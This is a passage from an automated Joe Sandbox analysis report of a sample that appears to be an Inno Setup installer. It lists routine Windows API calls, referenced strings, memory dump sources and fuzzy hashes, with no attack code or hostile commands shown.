                                                    • Opcode Fuzzy Hash: 0cda032a99fccbc67731b5396545ffd3d82a8b59ae0714c8f86b613c94d89fe8
                                                    • Instruction Fuzzy Hash: 17517070E04208ABDB11DF55C941A9EBBF9EF49304F1481BAE500BB3D1D778AE458B6A
                                                    APIs
                                                    • SetRectEmpty.USER32(?), ref: 0044D046
                                                    • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D071
                                                    • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D0F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: DrawText$EmptyRect
                                                    • String ID:
                                                    • API String ID: 182455014-2867612384
                                                    • Opcode ID: aa4c93a2d6761cb4316e3b9f58fd36adaf3be60b4be49a56ecc8a50fb57c6bd0
                                                    • Instruction ID: 2c01bf535b7fc2f64207dbeae616ffe24efc4250a83762b1f7dac36c1304b9fc
                                                    • Opcode Fuzzy Hash: aa4c93a2d6761cb4316e3b9f58fd36adaf3be60b4be49a56ecc8a50fb57c6bd0
                                                    • Instruction Fuzzy Hash: 6C517171E00248AFDB11DFA9C885BDEBBF8AF49308F14447AE845EB352D7389945CB64
                                                    APIs
                                                    • 73A1A570.USER32(00000000,00000000,0042F0C0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EF96
                                                      • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                    • SelectObject.GDI32(?,00000000), ref: 0042EFB9
                                                    • 73A1A480.USER32(00000000,?,0042F0A5,00000000,0042F09E,?,00000000,00000000,0042F0C0,?,?,?,?,00000000,00000000,00000000), ref: 0042F098
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: A480A570CreateFontIndirectObjectSelect
                                                    • String ID: ...\
                                                    • API String ID: 2998766281-983595016
                                                    • Opcode ID: aaeb4b64b252ec620ee19bd92df8033ea15f110d648c0c566ea30b5701249572
                                                    • Instruction ID: 43f07ddd406d3cd78f52d868909731211d08e22d210600ca561f601472f043fe
                                                    • Opcode Fuzzy Hash: aaeb4b64b252ec620ee19bd92df8033ea15f110d648c0c566ea30b5701249572
                                                    • Instruction Fuzzy Hash: A6318570B00128ABDB11DF99D841BAEB7F9FB48708F90447BF410A7392C7785E44CA59
                                                    APIs
                                                    • GetClassInfoA.USER32(00400000,?,?), ref: 00416477
                                                    • UnregisterClassA.USER32(?,00400000), ref: 004164A3
                                                    • RegisterClassA.USER32(?), ref: 004164C6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Class$InfoRegisterUnregister
                                                    • String ID: @
                                                    • API String ID: 3749476976-2766056989
                                                    • Opcode ID: 58713160258ce5f561964bbdae6a2794c8f6f6caf00f6f1604bd66b56dd4b990
                                                    • Instruction ID: 9d11af1acff112dbe95f15f3a9399eab9f365f4a7252c57533c35fba51c14aa0
                                                    • Opcode Fuzzy Hash: 58713160258ce5f561964bbdae6a2794c8f6f6caf00f6f1604bd66b56dd4b990
                                                    • Instruction Fuzzy Hash: 81316F702043409BD720EF68C981B9B77E5AB89308F04457FF949DB392DB39D944CB6A
                                                    APIs
                                                    • GetFileAttributesA.KERNEL32(00000000,0049806C,00000000,00497812,?,?,00000000,0049B628), ref: 0049778C
                                                    • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,0049806C,00000000,00497812,?,?,00000000,0049B628), ref: 004977B5
                                                    • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004977CE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: File$Attributes$Move
                                                    • String ID: isRS-%.3u.tmp
                                                    • API String ID: 3839737484-3657609586
                                                    • Opcode ID: 5e447f30b23232af434533287497b31b90de18d305760ab90fd2fc5e7a108e0f
                                                    • Instruction ID: cfa846df06bac921d3cc7342383d8013e9ea743293dbac669405f5124aadd281
                                                    • Opcode Fuzzy Hash: 5e447f30b23232af434533287497b31b90de18d305760ab90fd2fc5e7a108e0f
                                                    • Instruction Fuzzy Hash: 05213271E14209AFCF00EBA9C8859AFBBB8AF54314F51457AB414B72D1D6385E01CB59
                                                    APIs
                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                    • ExitProcess.KERNEL32 ref: 00404E0D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ExitMessageProcess
                                                    • String ID: Error$Runtime error at 00000000
                                                    • API String ID: 1220098344-2970929446
                                                    • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                    • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                    • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                    • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                    APIs
                                                      • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                      • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                      • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A70
                                                    • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456A9D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                    • String ID: LoadTypeLib$RegisterTypeLib
                                                    • API String ID: 1312246647-2435364021
                                                    • Opcode ID: e660801773f94f20b04beacac4d0dca05fe01ebd0f05b0c2a082d9499ce0d4df
                                                    • Instruction ID: dea98cbdfb45d66fad0868bd7db80167fcb8ebb816cd54e6ac056e4ed8ccdf78
                                                    • Opcode Fuzzy Hash: e660801773f94f20b04beacac4d0dca05fe01ebd0f05b0c2a082d9499ce0d4df
                                                    • Instruction Fuzzy Hash: A9119670B00604BFDB11DFA6CD51A5EB7BDEB8A705F518476BC04E3652DA389D04CA54
                                                    APIs
                                                    • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456F8E
                                                    • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045702B
                                                    Strings
                                                    • Failed to create DebugClientWnd, xrefs: 00456FF4
                                                    • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FBA
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                    • API String ID: 3850602802-3720027226
                                                    • Opcode ID: bc4e2302685a1611cdf589b1ebeb412e0de634acd2de00c3d71195a2fbe054b6
                                                    • Instruction ID: 364b6cfc2dd25a83f1288abab6954b7d1953a24f55fd1dbca2d44010d5bb0a44
                                                    • Opcode Fuzzy Hash: bc4e2302685a1611cdf589b1ebeb412e0de634acd2de00c3d71195a2fbe054b6
                                                    • Instruction Fuzzy Hash: 6D110471604240ABD310AB689C81B5F7BD49B15319F55403EFA849B3C3D3794C08C7BE
                                                    APIs
                                                      • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                    • GetFocus.USER32 ref: 004781EB
                                                    • GetKeyState.USER32(0000007A), ref: 004781FD
                                                    • WaitMessage.USER32(?,00000000,00478224,?,00000000,0047824B,?,?,00000001,00000000,?,?,?,0047FA10,00000000,004808CA), ref: 00478207
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: FocusMessageStateTextWaitWindow
                                                    • String ID: Wnd=$%x
                                                    • API String ID: 1381870634-2927251529
                                                    • Opcode ID: 84218ba3482459bc906772e13e797513dd116e5c3cf85ca98293f9821701720b
                                                    • Instruction ID: 5f1c8258d991fabeb8ce52e8cfeede19b84d8dc0ceec509adeab196e5a3e054a
                                                    • Opcode Fuzzy Hash: 84218ba3482459bc906772e13e797513dd116e5c3cf85ca98293f9821701720b
                                                    • Instruction Fuzzy Hash: C011C430644645AFC700FBA5D845A9E7BF8EB49304B5184BEF408E7651DB386D00CA69
                                                    APIs
                                                    • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E438
                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E447
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Time$File$LocalSystem
                                                    • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                    • API String ID: 1748579591-1013271723
                                                    • Opcode ID: 45f4a363f224ef8c5fed3f77cd0aa38b31e29c1c09915091c8c286ec18076b3a
                                                    • Instruction ID: 72319f5cb05664b7e116556de8a44c1f4f08e856cbf185e3f572017f7e9d6813
                                                    • Opcode Fuzzy Hash: 45f4a363f224ef8c5fed3f77cd0aa38b31e29c1c09915091c8c286ec18076b3a
                                                    • Instruction Fuzzy Hash: 3011F8A440C3919ED340DF6AC44432BBAE4AB99708F04896FF9C8D6381E779C948DB77
                                                    APIs
                                                    • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F57
                                                      • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                    • MoveFileA.KERNEL32(00000000,00000000), ref: 00453F7C
                                                      • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesDeleteErrorLastMove
                                                    • String ID: DeleteFile$MoveFile
                                                    • API String ID: 3024442154-139070271
                                                    • Opcode ID: b1543e803949c7e0bc7b6baa6fe4679c95893f4373d9700be0af1e5a7050e6bf
                                                    • Instruction ID: d61ccdf94e8101ca60a50ffa5b16d74e098655775539a7d8992e0f9997158dc0
                                                    • Opcode Fuzzy Hash: b1543e803949c7e0bc7b6baa6fe4679c95893f4373d9700be0af1e5a7050e6bf
                                                    • Instruction Fuzzy Hash: E6F062716041045BD701EBA2D94266EA3ECEB8430EFA0403BB900BB6C3DA3C9E09452D
                                                    APIs
                                                      • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592C1,00000000,00459479,?,00000000,00000000,00000000), ref: 004591D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseOpen
                                                    • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                    • API String ID: 47109696-2631785700
                                                    • Opcode ID: a4f8ebe625aa4241feead5212253246ce33a71640870ef86989e33138b66f8c9
                                                    • Instruction ID: b3b7ca93e3ee9f71f5f4917cf459f66c0bdee831e94fc7924cf2246e82346dcf
                                                    • Opcode Fuzzy Hash: a4f8ebe625aa4241feead5212253246ce33a71640870ef86989e33138b66f8c9
                                                    • Instruction Fuzzy Hash: 11F0A431300151EBD710EB5AD895B5E7698DB95356F50453BF940CB253C67CCC058B59
                                                    APIs
                                                      • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                    • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004831C1
                                                    • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004831E4
                                                    Strings
                                                    • System\CurrentControlSet\Control\Windows, xrefs: 0048318E
                                                    • CSDVersion, xrefs: 004831B8
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                    • API String ID: 3677997916-1910633163
                                                    • Opcode ID: 8c4194736c198406f1c4615c9bef297240f0128b093a56b4b0574b173b8ea383
                                                    • Instruction ID: 86ea9b687bc925f919ffd8904499e524e0617f710df10bb4bfec30536caacf1e
                                                    • Opcode Fuzzy Hash: 8c4194736c198406f1c4615c9bef297240f0128b093a56b4b0574b173b8ea383
                                                    • Instruction Fuzzy Hash: 84F03175E40208A6DF10EAE18C49BAF73BCAB04F05F104567E910E7281EB7AAB048B59
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B2E,00000000,00453BD1,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FC1,00000000), ref: 0042D902
                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D908
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                    • API String ID: 1646373207-4063490227
                                                    • Opcode ID: 7b96dfeca4fb46ac12370e2a7164d548b2292eba5de3f20d368527ccba0e5576
                                                    • Instruction ID: 46d83308b3a0af851ef73fb55c1ff88b015d3a0f0a3b668622d7e336d39da5d8
                                                    • Opcode Fuzzy Hash: 7b96dfeca4fb46ac12370e2a7164d548b2292eba5de3f20d368527ccba0e5576
                                                    • Instruction Fuzzy Hash: F2E0DFE0B00B4122D720257A1C82B5B10894B84768FA0043B3888E52D6EDBCDD841A2D
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAC8), ref: 0042EB5A
                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB60
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                    • API String ID: 1646373207-260599015
                                                    • Opcode ID: 3e5cb9d7abe0ff9b6486504588ced90e5b8f05a967361d48d4fc2df467991dfe
                                                    • Instruction ID: e22649ab5c5d02c0682c512352339c2c95c689ad11c13297e1ab925b23cbcb3c
                                                    • Opcode Fuzzy Hash: 3e5cb9d7abe0ff9b6486504588ced90e5b8f05a967361d48d4fc2df467991dfe
                                                    • Instruction Fuzzy Hash: B8D0C793711732566910B5FB3CD1DEB098C895427A39400B7F615E5541D55DDC1119AC
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004980FE), ref: 0044F777
                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F77D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: NotifyWinEvent$user32.dll
                                                    • API String ID: 1646373207-597752486
                                                    • Opcode ID: c1ce619e6872abdf5b4899d5f27880f5dd90b76e17064dac08d73993ed60d4d7
                                                    • Instruction ID: 704f9416b83fe6db864644e5aa21ade638d5456887e5d0d6230baff76c02d14e
                                                    • Opcode Fuzzy Hash: c1ce619e6872abdf5b4899d5f27880f5dd90b76e17064dac08d73993ed60d4d7
                                                    • Instruction Fuzzy Hash: 7DE012F0E4174499FB00BBB97A4671E3AD0E7A471CB00017FF454A62A1DB7C44184F9D
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498154,00000001,00000000,00498178), ref: 00497E7E
                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497E84
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: DisableProcessWindowsGhosting$user32.dll
                                                    • API String ID: 1646373207-834958232
                                                    • Opcode ID: d26faf3502760f2b8304c8b29f1b377702d6f34381249b52cb9d82fc0845b7a8
                                                    • Instruction ID: a447a91dd4d4791f70ca82ece540bd513dbb2543541ea1319c0fea98b289aaf7
                                                    • Opcode Fuzzy Hash: d26faf3502760f2b8304c8b29f1b377702d6f34381249b52cb9d82fc0845b7a8
                                                    • Instruction Fuzzy Hash: 61B09280668712549C0032F30C02B2B0C094840728B1000B73414A00C6CE6C9C004A3D
                                                    APIs
                                                      • Part of subcall function 0044B650: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F76D,004980FE), ref: 0044B677
                                                      • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B68F
                                                      • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A1
